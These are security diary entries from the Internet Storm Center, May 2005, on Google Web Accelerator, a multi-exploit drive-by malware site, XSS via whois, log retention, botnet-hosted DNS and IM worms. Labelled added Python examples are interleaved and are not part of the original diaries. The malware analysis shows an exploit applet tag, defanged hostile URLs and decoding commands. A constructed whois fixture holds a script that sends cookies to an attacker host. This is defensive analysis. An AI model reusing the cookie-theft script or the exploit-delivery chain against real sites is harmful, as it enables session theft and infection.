news.google.com. 900 IN CNAME news.l.google.com.
l.google.com. 900 IN SOA ns1.google.com.l.google.com.
dns-admin.google.com. 1115309515 900 900 1800 900
;; Query time: 37 msec
;; WHEN: Sun May 8 01:14:28 2005
;; MSG SIZE rcvd: 115

It seems the problems have been resolved in the meantime.

There was one report of a redirect during the downtime to a "sogo" search page. If you have captures of what DNS contained at those times, we'll be happy to receive them.

Microsoft SQL server 2000 SP4

Gilles from FrSIRT reported to us that Microsoft released SQL Server 2000 SP4 yesterday (not the beta release).


Swa Frantzen

Published: 2005-05-06

Google Web Accelerator; Snort with ClamAV; RSA SecurID WebAgent Overflow

Google Web Accelerator -- Much ado about caching

Google's new Web Accelerator beta is raising a surprising number of
concerns in, and around, the security community. For example, reader
Matthew S. writes in with the following recommendation that he has made
to his boss regarding this new tool:

"I think the security and privacy concerns with this software are
huge, and our users should not install it.

"It caches your cookies with Google servers. People using the
Accelerator are reporting that when they access a user-specific web site
they sometimes appear logged in as another user, in other words, Google is
accessing the site with someone else's cookie. Anything you access over http
(not https) is fair game to be cached either in your browser or Google's

"The pre-fetching is indiscriminate - a link on the page you're
visiting that says "delete", for example, is fair game. This can cause
havoc with poorly-written web apps (most web apps, in other words),
because it's not an anonymous spider clicking links, it's a session
with an authorized cookie.

"Use of this browser plug-in in its current state could increase
the risk of information disclosure through our public web apps. It's not
clear at this time if the tool will also share pre-fetched information
from internal web sites with Google, but that is a possibility."

Some of the concerns being raised are, in my opinion, premature. Certainly,
the ability to access the session of another user is troubling, but it is
also nothing new. These problems have plagued sites behind proxy caches for
years, but the affected community was much smaller. These are simple bugs
in caching systems, and will undoubtedly be fixed by Google like those
before them.

Link prefetching causing destructive behavior on "poorly-written web apps"
is likely to be a much harder nut to crack for Google, but I don't expect
that this will be a wide-spread disaster either; there are many hidden
cues within most html documents that suggest links that are part of a
menuing system.
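The prefetch problem above, as an added example that is not code from the diary or from Google: a toy application that hangs item deletion off plain links, a simulated accelerator that follows every href with the user's session cookie, and the hardened handler that refuses to change state on GET/HEAD and requires a POST carrying a per-session token. The application, routes, cookie value and token scheme are all hypothetical.

```python
# Added example (not from the diary or from Google): what a cookie-carrying
# link prefetcher does to an application that changes state on GET, and the
# usual fix. App, routes, cookie value and token scheme are hypothetical.
import re
import secrets
from urllib.parse import urlparse, parse_qs

SAFE_METHODS = {"GET", "HEAD"}   # RFC 2616: must not have side effects
SESSION_COOKIE = "session=ok"    # stands in for the user's real session


class ItemStore:
    def __init__(self):
        self.items = {1: "report.doc", 2: "notes.txt"}
        self.csrf_token = secrets.token_hex(16)   # per-session secret

    def page(self):
        """The listing page; each item has a 'delete' link a prefetcher will follow."""
        return "".join(
            f'<a href="/delete?id={i}">delete {name}</a>'
            for i, name in self.items.items()
        )

    def handle_vulnerable(self, method, url, cookie, form=None):
        """Deletes on any request with a valid cookie, including a GET."""
        parsed = urlparse(url)
        if parsed.path == "/delete" and cookie == SESSION_COOKIE:
            self.items.pop(int(parse_qs(parsed.query)["id"][0]), None)
            return 200
        return 404

    def handle_hardened(self, method, url, cookie, form=None):
        """Safe methods never mutate; mutations need POST plus the session token."""
        parsed = urlparse(url)
        if parsed.path != "/delete":
            return 404
        if method in SAFE_METHODS:
            return 405                       # a prefetcher or spider gets this
        if cookie != SESSION_COOKIE:
            return 403
        if not form or not secrets.compare_digest(form.get("token", ""), self.csrf_token):
            return 403                       # also blocks cross-site POSTs
        self.items.pop(int(form["id"]), None)
        return 200


def prefetch(store, handler, cookie=SESSION_COOKIE):
    """Simulated accelerator: GET every href on the page with the user's cookie.
    Returns the item ids that survive."""
    for href in re.findall(r'href="([^"]+)"', store.page()):
        handler("GET", href, cookie)
    return sorted(store.items)


if __name__ == "__main__":
    v = ItemStore()
    print("vulnerable app after prefetch:", prefetch(v, v.handle_vulnerable))
    h = ItemStore()
    print("hardened app after prefetch:", prefetch(h, h.handle_hardened))
    status = h.handle_hardened("POST", "/delete", SESSION_COOKIE,
                               {"id": "1", "token": h.csrf_token})
    print("legitimate POST delete:", status, sorted(h.items))
```

The point of the 405 branch is that it does not matter whether the requester is Google, a corporate proxy, a browser's own prefetch or a search spider: a link that can be fetched with GET will eventually be fetched by something that is not the user, so the only robust fix is on the server side.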

However, I am personally concerned about the longer term effects of
Google having access to every users' entire browsing session, as well as
the effects it will have on site administrators in terms of access control
and statistics gathering, and discussions have already been started on
how to combat this global proxy, mostly by blocking IP ranges.


IP blocking is a rather crude answer to this issue, and I'd be very
interested to see if there were a more elegant solution based upon
identifying characteristics in the proxied requests, as one cannot
expect the IP ranges to stay constant if this becomes a popular service.

Furthermore, there are a number of potentially troublesome issues
involved in having a giant global proxy-cache service available.
In the short term, GWA is likely to be useful in breaking through
restrictive corporate filtering proxies, which I expect to see
solved quickly. However, if GWA happens to become a popular
service, we can expect to see it used as a "poor-man's Akamai",
which has a number of worrying implications for phishing scams
and malware distribution being even more decoupled from the
end node; resulting in a very busy abuse desk at Google.

From a user's perspective, some folks have gone as far as classifying
GWA as spyware, which has a very slight, if highly sarcastic, ring of truth
to it. While GWA is not sneakily installed on your system without your
knowledge, it does have the potential for collecting a vast array of
information that end users may not wish to allow Google to have, regardless
of their motives.

Users will have to ask themselves what they're trading in exchange for a
global web caching solution, and decide if it is worth it or not.
Of course, users have already had to make similar privacy vs. functionality
decisions with gmail and the google toolbar.

For more coverage of this topic:


ClamAV integration with Snort

William Metcalf and Victor Julien have written a preprocessor for Snort
that integrates the ClamAV antivirus package with existing IDS or IPS
functionality in Snort. This could become a very happy marriage of
software, and is definitely worth checking out!


RSA SecurID WebAgent Heap Overflow

SEC-1 Ltd. has released a notification of a heap overflow in the RSA SecurID
WebAgent, versions 5.0 through 5.3. A proof-of-concept tool is not currently
available, but the published details are sufficient to indicate where to
begin searching for the bug. The flaw allows an unauthenticated attacker
to execute code in the LocalSystem context.
Patches have been made available to anyone with a current RSA maintenance
login at https://knowledge.rsasecurity.com


Published: 2005-05-05

Catch of the Day; Scripted mass hack; Not-so-black Tuesday ahead

Viva el 5 de mayo!

Our Mexican friends celebrate Cinco de Mayo today, a holiday commemorating the defeat of Maximilian in 1867. Since I speak Perl better than Spanish, I'll stop writing today's diary in that language, but I wish you all a great fiesta! It's the only one this century that falls on 5-5-5 :-).

Catch of the day: smelly malware

With the suspicious nature common to malware survivors, ISC reader Phil "got a bit worried" when he noticed that a web site was opening a zero-width frame that seemed to hide something. After digging around some, he found his hunches confirmed, and also two files that none of the AV vendors on <A HREF="http://www.virustotal.com">virustotal.com</A> seemed to recognize as hostile. Here's a write-up of what we found, to sharpen your malware survivor senses. Some of the original HTML off the hostile site had to be heavily modified for this write-up, mainly by cutting out sections or converting characters to "X". We wouldn't want a SANS ISC diary to trigger your workstation or perimeter antivirus...
The base exploit page


Exploit #1 - Java Classloader Vulnerability
The first exploit, hidden behind the "e1" frame, is a Java based privilege escalation, a variant of the Java Bytever/Classloader family of exploits. The corresponding vulnerability is pretty old (MS03-011), making "success" of this exploit highly doubtful.

APXLET ARCHIVE="/e1/java.jar" CODE="NudeBoxx.class"

In addition to the actual exploit code, the JAR archive also contains a ZIP file. But things are not always what they seem...

$ file javautil.zip
javautil.zip: DOS executable (EXE)

The ZIP turns out to be an EXE obfuscated with the FSG packer, and when run downloads and executes a file called "update.exe" from the attacker's site. More on update.exe in a minute.
Exploit #2 - IE Vulnerabilities
The second exploit, hidden behind the /e2/ frame, is nastier. It starts with checking the browser version of the user, and then supplies the correct exploit to match. For older versions of Windows, the following encoded script is returned (heavily modified - Antivirus tools seem to love this exploit):

... etc going on for 2 pages of numbers

XOR encoding is frequently used in JavaScript exploits as an attempt to avoid detection by IDS sensors and Antivirus software. A little PERL magic can be used to rapidly unwrap the above XOR obfuscation without having to actually run the code:

$ perl -pe '$x=24; s/(\d*);/chr($1^$x++)/ge' index2old.html

But, alas, the resulting mess is STILL encoded:

... etc going on for one page of %u00xx numbers ...

Some more PERL magic later

$ perl -pe 's/\%u00(..)/chr(hex($1))/ge' index2old.out

we finally reveal the exploit hidden under this double layer of encoding.

hxxp://malwaresite.url//index.cXm :: /index.html
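The two Perl one-liners above, as an added example in Python that is not code from the diary: one decoder for both layers, plus the matching encoder so the sample below is constructed locally rather than taken from the hostile page. The key start value (24) and the "%u00xx" layer follow the diary; the sample text is the diary's own decoded reference string and the encoder is an assumption about how the page was built, not something recovered from it.

```python
# Added example (not code from the diary): the two Perl one-liners above as
# one Python decoder, with an encoder so the sample is constructed here
# rather than taken from the hostile site. The key start value 24 and the
# "%u00xx" layer follow the diary; the sample text is the diary's reference.
import re

KEY_START = 24


def xor_decode(blob, key_start=KEY_START):
    """Layer 1: 'n;n;n;...' where the i-th number is ord(char) ^ (key_start + i).
    Mirrors perl -pe '$x=24; s/(\\d*);/chr($1^$x++)/ge'."""
    return "".join(
        chr(int(num) ^ (key_start + i))
        for i, num in enumerate(re.findall(r"(\d+);", blob))
    )


def unicode_unescape(text):
    """Layer 2: '%u00xx' back to characters. Mirrors the second one-liner and,
    like it, only touches the %u00xx range; other %uXXXX escapes stay as-is."""
    return re.sub(r"%u00([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), text)


def decode(blob):
    """Both layers, undone in the reverse of the order the page applied them."""
    return unicode_unescape(xor_decode(blob))


def encode(plain, key_start=KEY_START):
    """Inverse of decode(); used only to build the constructed sample below."""
    if any(ord(c) > 0xFF for c in plain):
        raise ValueError("%u00xx form only covers code points up to 0xFF")
    escaped = "".join(f"%u00{ord(c):02x}" for c in plain)
    return "".join(f"{ord(c) ^ (key_start + i)};" for i, c in enumerate(escaped))


# Constructed sample: the decoded reference from the diary, nothing live.
SAMPLE_PLAIN = "hxxp://malwaresite.url//index.cXm :: /index.html"
SAMPLE_BLOB = encode(SAMPLE_PLAIN)

if __name__ == "__main__":
    print("layer 1 input :", SAMPLE_BLOB[:60], "...")
    print("after xor     :", xor_decode(SAMPLE_BLOB)[:40], "...")
    print("after unescape:", decode(SAMPLE_BLOB))
```

Note the key is a running counter, not a fixed byte, so a decoder that guesses a single XOR key will produce garbage; the counter also means the key stream depends only on position, which is why the Perl version works on the whole file in one pass.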

Yes - it's the oldie but goldie Microsoft Compiled Help file (CHM) exploit, MS02-055. Unlikely to work on a current OS. Which is why the /e2/ exploit started with a browser detection routine - for users surfing to the hostile page with XP SP2, the attacker doesn't even try the CHM vulnerability, but right away launches an exploit known as "HijackClick3", a variant of the infamous "Drag and Drop" vulnerability in Internet Explorer (MS04-038 / <A HREF="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0841">CAN-2004-0841</A>). This exploit is too complicated, and too hard to render harmless, to include here in the diary.

Exploit #3 - More Internet Explorer Vulnerabilities
Lurking behind the /e3/ frame is an exploit for a pretty recent vulnerability, MS05-001. The exploit, similar to the one documented by <A HREF="http://www.frsirt.com/exploits/20041228.CMDExe.php">FRSIRT</A>, downloads a file called "cmdexe.txt", which in turn fetches and starts a file "cmdexe.exe", all without requiring user interaction of course. cmdexe.exe is the same downloader trojan that we have already encountered earlier in the disguise of "javautil.zip", and it also fetches "update.exe" from the malware site.

The payload
At the time of writing, update.exe is not recognized by any of the antivirus products we could test it with. The file is packed with FSG and is almost 400 kB after unpacking. Lots of nasty things can be done in 400k of code... From what we have seen so far in analyzing the binary, it contains a component that gathers information on the system and submits this bounty via HTTP POST to a web server in Europe. It also installs a multifunctional proxy (HTTP/SOCKS/POP3/etc). What else it does we don't know yet. Update 20:15 UTC: McAfee/NAI have dubbed this file "Backdoor-CRR".
Thanks to a hosting provider who very quickly and competently responded to our report of the malicious site, the site hosting this flurry of exploits is no more. But the web servers in Europe to which update.exe is reporting information on infected hosts are still up.

One more scripted mass hack

It seems as if several web sites were modified in yet another mass hack yesterday, similar to the one we've reported <A HREF="http://isc.sans.org/diary.php?date=2005-03-13">two months ago</A>. Most likely, a script was used to amend all web sites hosted on one or more shared servers with a hostile IFRAME, redirecting visitors to hxxp://www.tgp.la/or.html. Don't go there - it's an Adware site, redirecting to places where you maybe should not tread, including a page on realizeit.biz that tries the CHM exploit to drop a present. Checking with a search engine, it looks as if more than 1500 pages have been thus modified. Thanks to ISC reader Roger for letting us know.

Next Tuesday is Patch Tuesday...

...and it seems as if it's going to be a quiet one, for a change. According to Microsoft's <A HREF="http://www.microsoft.com/technet/security/bulletin/advance.mspx">advance announcement</A>, we can expect one single bulletin on May 10, rated "Important".

Daniel Wesemann

EMail: echo "ebojfm/jtdAhnbjm/dpn" | perl -pe 's/(.)/chr(ord($1)-1)/ge'


Published: 2005-05-04

OS X VPN vuln; XSS from unexpected places; some ramblings on storage

MacOS X vpnd vulnerability disclosed

A local buffer overflow vulnerability in Apple MacOS X was disclosed on the vulnwatch mailing list today. The VPN daemon (vpnd), setuid by default, can reportedly be exploited to execute arbitrary code by a local non-privileged user.
CVE ID CAN-2005-1343 has been assigned to this. Apple Security Update 2005-005 fixes this and other issues. http://docs.info.apple.com/article.html?artnum=301528

XSS from unexpected places

A friend of the ISC passed along an email discussing code insertion showing up in whois records. Whois servers maintain contact information for registered domains and IP address allocations. Through the use of '<script>' tags, code can be executed by browsers when viewing those records.

Similar unexpected sources of code may include network traces, system logs, or anything else that can contain text from potentially untrusted origins. If you're using Mozilla Firefox as a browser, you can use the "prefbar" extension to quickly turn Java/JavaScript/Flash on and off without navigating menus, which makes applying POLP (the Principle of Least Privilege) a lot more convenient.
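The server-side half of this, as an added example that is not code from the diary or from any whois client: a viewer that drops whois fields straight into an HTML table, beside the version that escapes every untrusted string at the point it enters the markup. The record, the attacker host and the viewer functions are all constructed for the example; the same treatment applies to log and packet-trace viewers.

```python
# Added example (not from the diary): a whois record viewer that interpolates
# the record into HTML as-is, beside the escaped version. The record and the
# attacker host are constructed; the viewer functions are hypothetical.
import html
import re

# Constructed whois-style record with a hostile registrant field.
SAMPLE_RECORD = """Domain Name: EXAMPLE.COM
Registrant Name: <script>document.location='http://attacker.invalid/?c='+document.cookie</script>
Admin Email: admin@example.com"""

SCRIPT_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def split_fields(record):
    """'Key: value' lines -> list of (key, value); both sides are untrusted."""
    fields = []
    for line in record.splitlines():
        key, _, value = line.partition(":")
        fields.append((key.strip(), value.strip()))
    return fields


def render_raw(record):
    """The viewer that gets owned: values land in the page verbatim."""
    rows = "".join(f"<tr><th>{k}</th><td>{v}</td></tr>"
                   for k, v in split_fields(record))
    return f"<table>{rows}</table>"


def render_escaped(record):
    """Escape every untrusted string where it enters the HTML (keys too)."""
    rows = "".join(
        f"<tr><th>{html.escape(k, quote=True)}</th>"
        f"<td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in split_fields(record)
    )
    return f"<table>{rows}</table>"


def has_live_script(rendered):
    """Crude check: did a script tag survive into the output?"""
    return SCRIPT_RE.search(rendered) is not None


if __name__ == "__main__":
    print("raw     :", has_live_script(render_raw(SAMPLE_RECORD)))
    print("escaped :", has_live_script(render_escaped(SAMPLE_RECORD)))
    print(render_escaped(SAMPLE_RECORD))
```

Escaping at output, rather than trying to strip "bad" tags on input, is the choice that survives new field names and new browsers; the registrant field here is only one of many places a registrar will echo text it never validated.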

Some ramblings on storage

Someone emailed asking for recommendations on storage of security log data and I thought this might be useful for others facing similar planning challenges -

We keep data around for three reasons: Someone important says we need
to, we are going to use the data later, or we just like having it or
are too lazy to clean it out. A major goal in any storage project
should be to get that down to the first two. Although I haven't
gathered empirical evidence to support this, I'll venture that a
large percentage of our storage challenges are the result of number
three. That can most readily be dealt with through self discipline
and/or draconian quotas. Let's examine the first two a little more.

First, we need to contend with regulatory obligations. In the case of
SOX or HIPAA, there are plenty of folks making money by helping
companies out with compliance, since there are fairly healthy data
retention and security requirements with both. For my research, I am
required by the funders to keep all raw data on hand for at least
three years - we are building yet another data library at this time.
You may have other requirements - speak with your compliance officer
so you can be sure to place the blam^H^H^H^H^H^H^H^H^H^H^H^H^Hcover
all the bases.

The secondary concern is usefulness. The usefulness of a record
depreciates with time, as its contextual relevance decays. In other
words, as a piece of data becomes less likely to be correlated with
new events, its (other than compliance) value shrinks. If you are
doing no analysis at all, then the usefulness of any logs is nil.

If you see something in your firewall logs and wish to correlate with
the past month's worth of logs, they had better be available. Without
anyone doing such analysis, the month of logs really isn't all that
useful. A grocery store owner probably doesn't need to keep those
firewall logs very long, same goes for her video surveillance tapes
(she'll know pretty quickly whether or not those need reviewing!) Her
stock ledgers and employee records are likely to be held onto for
years, as there may be government bodies who say so, or she
recognizes the efficiency gains that she can reap by correlating
data and trending "shrinkage".

Aggregate analysis of data (bandwidth percentiles, IDS alert class
frequency, storage utilization, etc.) requires raw metrics be retained
until that aggregation takes place. After that, the raw data can be
discarded if you will not be doing anything further with it. Any
meta-analysis using the monthly aggregates will necessitate storage &
retrieval of those aggregates, until *they* are no longer needed. And
so on, and so on. Essentially, it is a distilling process, where you
boil off what isn't needed any longer, while the essence of it remains
available for consumption or later cooking.

With network traffic, this distillation process often starts at the
router, returning netflows rather than raw packet data. In the case of
IDS, often raw packet captures are fed through some rule-based engine
and its findings are reported, sometimes including the specific
libpcap records that are related to an alert event. Once you have this
data you then draw pretty graphs, give your monthly briefing, and earn
a nice bonus. Then you can discard the raw data, keeping the graphs
for the quarterly summary. However, if Kirby from accounting is
colorblind and you are likely to be asked to recreate them as bar
graphs instead of pie charts, you may want to hang onto the raw data a
little longer, at least until after the quarterly.

I personally am a packet geek. I love to roll around in them and get
dirty as much as possible, but I recognize their value diminishes
pretty rapidly, so I generally go with full packets at first, then
reduce them with editcap to 128 bytes after 48 hours, then to 48 bytes
after a month. The statistics pulled from them I keep around for a
year, then they are overwritten.

Back to your question, "any pointers?". I advise a strategy along
these lines:

1. Identify any regulatory requirements
2. Examine current and anticipated analysis methods
3. Identify data required to support #2 and its retrieval frequency
4. Codify what you find in #2 into policy so folks (and you) don't go
hog wild
5. Factor in organizational growth, including system deployment,
bandwidth, etc.
6. Factor in privacy and security needs - crypto is good, but adds
7. Given the above, calculate online, nearline & offline storage
8. Double #7
9. Talk to competing storage vendors about meeting #7 AND demand
performance demos. They have been helping others meet sophisticated
needs for some time and probably can help sanity check your proposed
strategy, (maybe without paying them for the consulting!). Get
those demos, onsite if possible. Don't settle for white papers,
someone else's reviews, etc. If they want your $ they'll work for
10. Once the system(s) is in place, schedule regular emergency
procedure drills. Expect there to be fires, power failures, broken
water pipes, physical and online intrusions, etc. You may want to
consider this during the planning phases, as well.

A few general notes:

- Software compression may seem like a good idea, but in production
more aggressive algorithms kill your performance. Go for hardware
compression on your LTO drives for offline stuff.

- For large volumes of integrity-critical data, take a look at some of
the new CAS and hard-disk WORM technologies. Expensive, but worth it.
Oh, yeah - don't get too wrapped up in the MD5 vs. SHA1 arguments.
Some CAS vendors will claim to be "more secure" since they use SHA1.
Yes, there is an academic proof for MD5 collisions, but in reality
your data will be long-ago worthless by the time someone can exploit
that on a real storage system.

- End to end security is essential. Don't forget about offline and
offsite storage, including physical site and transportation. Don't let
a disgruntled minimum wage courier be the weakest link in your
organization's data confidentiality. I've seen it happen.




Published: 2005-05-03

Botnets Host DNS; 'leet Names and Security Tools

Botnets Used to Host DNS for Phishing

A recent post to the Dailydave mailing list, titled , described an incident similar to the report we received yesterday. The report outlined a large organization's battle against a botnet that implemented a phishing attack against the organization's customers. The trend to use bots for hosting phishing websites on compromised systems is not new, and was documented in the Register article titled . Using bots in this manner makes it difficult to shut down the malicious site, because the attacker can quickly modify the domain record to point to another compromised system. One way to defend against such attacks is to work with the company hosting the DNS server that resolves the malicious domain name to remove or modify the offending records.

Attacks that we're observing now are becoming more elaborate. In the most recent report, the attacker was using a botnet to host not only the malicious websites, but also the DNS servers that provided domain resolution services for the targeted domain name. This setup allowed the attacker to move to a new DNS server when one of the malicious servers got shut down. An organization battling this threat typically has to deal with the registrar of the malicious domain, instead of attempting to shut down the individual DNS server. Unfortunately, many domain registrars don't have formal procedures for dealing with such requests, which makes it difficult for organizations to defend against such attacks.

Some ISPs can help their customers combat such attacks by implementing a form of domain hijacking, intercepting and redirecting malicious DNS traffic that traverses their network. While this approach does not entirely mitigate the issue, it does mitigate it within the ISP's network; it is particularly effective if implemented by a large ISP. Considering the limitations of this mechanism, having domain registrars develop processes for addressing this attack scenario would be very helpful.

'leet Names and the Distribution of Security Tools

The file name of Stinger, McAfee's stand-alone tool for detecting and removing popular malware specimens, has been changed from stinger.exe to ST1NGER.EXE; notice the use of number "1" instead of letter "i". (See "Update 1" below to learn how this has changed since this diary was originally published.) This is a response to the
self-defense tactic of looking for programs named stinger.exe. Using a name other than stinger.exe allows McAfee's tool to run on the infected system. This is briefly mentioned in the , and on the . One of our readers wrote to us, suspicious of the new file name. It didn't help that the screen shot on the Stinger download page showed the original file name of stinger.exe.

The use of number "1" in the new name to replace letter "i" is a poor choice because of its resemblance to techniques attackers use to fool victims. Consider, for example, an attack that employs the domain name paypa1.com, using the number "1" (one) rather than the letter "l" (L), in a phishing scheme. Computer users are starting to pay attention to common letter replacements like this, and are learning to become suspicious of them. We should shy away from naming schemes that interfere with this learning process.

Perhaps a better tactic would be to automatically assign a random file name to a tool such as Stinger when the user downloads it. A similar approach
for naming anti-rootkit utilities such as Sysinternals and F-Secure to get around the tactic of rootkits modifying their behavior when scanned by known security tools.

Regardless of the file naming scheme, it would be very helpful to see MD5 hashes of the security tools we download, which the vendors could make available on websites other than those hosting the tools. Having a SHA-1 hash of the executable as well would be even nicer. Those worried about potential
and MD5 might argue for the use of another algorithm. Regardless of the algorithm, having a cryptographic hash or signature of the executable would help concerned users and administrators verify the integrity of the downloaded tool.

Update 1: McAfee notified us that they've now changed the file name of the Stinger tool from ST1NGER.EXE to s-t-i-n-g-e-r.exe. Thanks for addressing the immediate problem so quickly! McAfee is in the process of evaluating other methods of circumventing anti-Stinger tactics.

Update 2: I modified the diary to correct the fact that the Stinger description page actually includes a note about the change in the tool's name. This information was in the Update History section at the bottom of the page. I originally stated that this information was not included in the page at all. This information is also now included next to the download link on that page.

Lenny Zeltser

ISC Handler of the Day



Published: 2005-05-02

Top 20 update; IM malware and IRC bots are the flavor of the day; Sober variant

SANS Top 20 Quarterly update


On May 2, 2005, the sponsors of the Top20 project released the first installment in a new program of quarterly updates to the Top20. It updates the annual Top20 and provides an additional roadmap to the new vulnerabilities that must be eliminated in any Internet-connected organization.

IM malware and IRC bots are the flavor of the day

There were multiple reports this weekend of malware spreading via
AIM and other instant messaging, which then logged the compromised
systems into an IRC channel to be fed instructions on where to download
more nasties.

One organization noticed a heavy increase in ARP and TCP port 445 traffic;
the infected systems were scanning locally, and then the outbound IRC traffic
was noticed.

1- Hey check this out
2- Click on link
3- Download and run goodies
4- Your computer isn't really answering to you anymore
5- Your computer logs into IRC all by itself
6- The new master tells your computer to download more goodies
7- More malware is downloaded and installed
8- Your computer is now sending 'hey check this out' to all your buddies on IM
9- Your computer is now infecting other computers by scanning them
10- Your computer is now sending out spam and viruses, attacking others, and
generally not doing anything useful that you would like it to do, it's too busy.

Aren't you glad you checked it out?
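The sequence the organization above noticed, a local tcp/445 sweep followed by outbound IRC, written as a check over flow records. This is an added example, not code from the diary or from any product: the record format, addresses, ports and the threshold are constructed or assumed, and the ARP volume that was the first symptom is not visible in flow data and is left out.

```python
# Added example (not from the diary): the sequence the organization above
# observed, a local tcp/445 sweep followed by outbound IRC, as a check over
# flow records. Record format, addresses, ports and the threshold are all
# constructed or assumed; ARP volume is not in flow data and is left out.
from collections import defaultdict
import ipaddress

INTERNAL = ipaddress.ip_network("10.0.0.0/8")     # assumed internal range
IRC_PORTS = {6666, 6667, 6668, 6669, 7000}        # common, not exhaustive
SCAN_THRESHOLD = 20        # distinct internal 445 targets from one source


def parse_flow(line):
    """Constructed format: 'epoch src dst proto dport'."""
    ts, src, dst, proto, dport = line.split()
    return {"ts": int(ts), "src": src, "dst": dst,
            "proto": proto.lower(), "dport": int(dport)}


def suspicious_hosts(lines):
    """Sources that both swept internal tcp/445 and reached an external IRC port."""
    smb_targets = defaultdict(set)
    irc_peers = defaultdict(set)
    for rec in map(parse_flow, lines):
        if rec["proto"] != "tcp":
            continue
        dst_internal = ipaddress.ip_address(rec["dst"]) in INTERNAL
        if rec["dport"] == 445 and dst_internal:
            smb_targets[rec["src"]].add(rec["dst"])
        elif rec["dport"] in IRC_PORTS and not dst_internal:
            irc_peers[rec["src"]].add(rec["dst"])
    hits = {}
    for src in set(smb_targets) & set(irc_peers):
        if len(smb_targets[src]) >= SCAN_THRESHOLD:
            hits[src] = {"smb_targets": len(smb_targets[src]),
                         "irc_peers": sorted(irc_peers[src])}
    return hits


# Constructed sample: 10.0.0.5 sweeps 10.0.1.1-30 on 445, then joins IRC;
# 10.0.0.9 touches two file servers (normal); 10.0.0.7 is only an IRC user.
SAMPLE = [f"{1115000000 + i} 10.0.0.5 10.0.1.{i} tcp 445" for i in range(1, 31)]
SAMPLE += [
    "1115000040 10.0.0.5 198.51.100.20 tcp 6667",
    "1115000041 10.0.0.9 10.0.2.10 tcp 445",
    "1115000042 10.0.0.9 10.0.2.11 tcp 445",
    "1115000043 10.0.0.7 198.51.100.21 tcp 6667",
]

if __name__ == "__main__":
    for host, info in suspicious_hosts(SAMPLE).items():
        print(host, info)
```

Requiring both behaviours from the same source is what keeps the file server that legitimately talks to many clients, and the user who simply runs an IRC client, out of the result; a bot that uses a non-standard control port will evade the port list, which is why the IRC side is the weaker of the two signals.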

New Sober Variant

A new sober variant is making the rounds, spreading surprisingly quickly.
We have received multiple reports, the file name we have seen is our_secret.zip.
Your anti-virus vendor of choice will have named it something interesting,
with 'sober' somewhere in there.




Adrien de Beaupré

Handler of the day



Published: 2005-05-01

IM and Malware

IM and Malware

There are a lot of great uses for IM and folks love to use it. But care needs to be taken when clicking on links. We have received several reports of suspicious links being received which upon further analysis are really links to malware. Make sure you know what you're clicking on, even if the link comes from someone that you know. Malware can send out links to itself to everyone in the person's buddy list. Take care when you feel the need to click... you might get more than you bargained for.

All has been very quiet so far for this shift, but stay tuned for further updates.

Lorna Hutcheson

Handler on Duty